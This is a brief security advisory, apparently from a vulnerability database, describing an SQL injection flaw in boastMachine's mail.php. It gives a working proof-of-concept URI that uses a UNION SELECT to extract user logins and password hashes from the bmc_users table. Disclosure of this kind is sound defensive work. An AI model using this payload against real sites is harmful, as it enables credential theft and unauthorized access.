|
boastMachine 'mail.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1 |
|
|
Privacy Statement |